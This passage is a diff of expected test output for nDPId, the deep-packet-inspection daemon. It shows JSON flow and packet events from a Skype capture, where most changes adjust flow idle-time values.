-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1431970667195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KkFAAEAGkU3AqAEib91Njsg4nE30S7v4xRcL8IAQECxb2QAAAQEICj4yBU9NkBSe"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431970666958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666958,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIpxVyDpdiXkDjlpHhaASOJCjtgAAAgQFrAQCCApO3n4vPjIEMAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431970666958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666958,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TkBAAEAGoUHAqAEi1cezsMg6nFWOWkeFXYl5BIAQECz6qQAAAQEICj4yBGdO3n4v"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431970666974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666974,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIpxgyDkZrLIb0UAi+qASOJChgQAAAgQFrAQCCApMVm\/iPjIEMAEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431970666974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0VXBAAEAGmqfAqAEinTfrqsg5nGDRQCL6GayyHIAQECz4ZQAAAQEICj4yBHZMVm\/i"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1431970667029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667029,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIpxFyDfIYnGx6BtHvqASOJAYmAAAAgQFrAQCCApOwLWvPjIEMAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1431970667029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667029,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ekBAAEAG3vPAqAEinTeCjsg3nEXoG0e+yGJxsoAQECxvRgAAAQEICj4yBKxOwLWv"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1431970667195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxNyDjFFwvv9Eu7+KASOJAFzgAAAgQFrAQCCApNkBSePjIEMAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1431970667195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KkFAAEAGkU3AqAEib91Njsg4nE30S7v4xRcL8IAQECxb2QAAAQEICj4yBU9NkBSe"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6bg8AAEARKxbAqAEinTeCjDLdnEsAJgsKe3ECMurpMuGdyMUwflNlvhyptKR18dfr99Rpa+D7"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -541,22 +541,22 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkhAAAEARZSnAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAux9AAEAGAGPAqAEib91Njsg7Abv27osgAAAAALAC\/\/8jHQAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAscJAAEAGp2XAqAEinTeCjsg8AbsAEWpXAAAAALAC\/\/\/YaAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABA27JAAEAGFFnAqAEinTfrqsg9AbvoZ1qDAAAAALAC\/\/+WyAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgztAAEAGbDrAqAEi1cezsMg+AbsskrryAAAAALAC\/\/\/xlwAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1431970668577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668577,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIgG7yD6AD\/E0LJK686ASOJCKGgAAAgQFrAQCCApO3n\/CPjIKcgEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1431970668577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668577,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IFlAAEAGzyjAqAEi1cezsMg+AbsskrrzgA\/xNYAQECzhBgAAAQEICj4yCrBO3n\/C"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1431970668598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668598,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIgG7yD366YaT6GdahKASOJAv5wAAAgQFrAQCCApMVnF1PjIKcgEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1431970668598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668598,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0q7lAAEAGRF7AqAEinTfrqsg9AbvoZ1qE+umGlIAQECyGvgAAAQEICj4yCsVMVnF1"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431970668642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668642,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIgG7yDxDIW5aABFqWKASOJD5UQAAAgQFrAQCCApOwLdCPjIKcgEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431970668642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668642,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ULBAAEAGCITAqAEinTeCjsg8AbsAEWpYQyFuW4AQECxP\/wAAAQEICj4yCu9OwLdC"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431970668803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668803,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7yDsQofTJ9u6LIaASOJCSWQAAAgQFrAQCCApNkBYwPjIKcgEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431970668803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668803,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qSRAAEAGEmrAqAEib91Njsg7Abv27oshEKH0yoAQECzoZgAAAQEICj4yC49NkBYw"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAux9AAEAGAGPAqAEib91Njsg7Abv27osgAAAAALAC\/\/8jHQAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAscJAAEAGp2XAqAEinTeCjsg8AbsAEWpXAAAAALAC\/\/\/YaAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABA27JAAEAGFFnAqAEinTfrqsg9AbvoZ1qDAAAAALAC\/\/+WyAAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668515,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668515,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1431970668515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668515,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgztAAEAGbDrAqAEi1cezsMg+AbsskrryAAAAALAC\/\/\/xlwAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1431970668577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668577,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIgG7yD6AD\/E0LJK686ASOJCKGgAAAgQFrAQCCApO3n\/CPjIKcgEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1431970668577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668577,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IFlAAEAGzyjAqAEi1cezsMg+AbsskrrzgA\/xNYAQECzhBgAAAQEICj4yCrBO3n\/C"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1431970668598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668598,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIgG7yD366YaT6GdahKASOJAv5wAAAgQFrAQCCApMVnF1PjIKcgEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1431970668598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668598,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0q7lAAEAGRF7AqAEinTfrqsg9AbvoZ1qE+umGlIAQECyGvgAAAQEICj4yCsVMVnF1"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431970668642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668642,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIgG7yDxDIW5aABFqWKASOJD5UQAAAgQFrAQCCApOwLdCPjIKcgEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431970668642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668642,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ULBAAEAGCITAqAEinTeCjsg8AbsAEWpYQyFuW4AQECxP\/wAAAQEICj4yCu9OwLdC"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431970668803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970668803,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIgG7yDsQofTJ9u6LIaASOJCSWQAAAgQFrAQCCApNkBYwPjIKcgEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431970668803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668803,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qSRAAEAGEmrAqAEib91Njsg7Abv27oshEKH0yoAQECzoZgAAAQEICj4yC49NkBYw"} 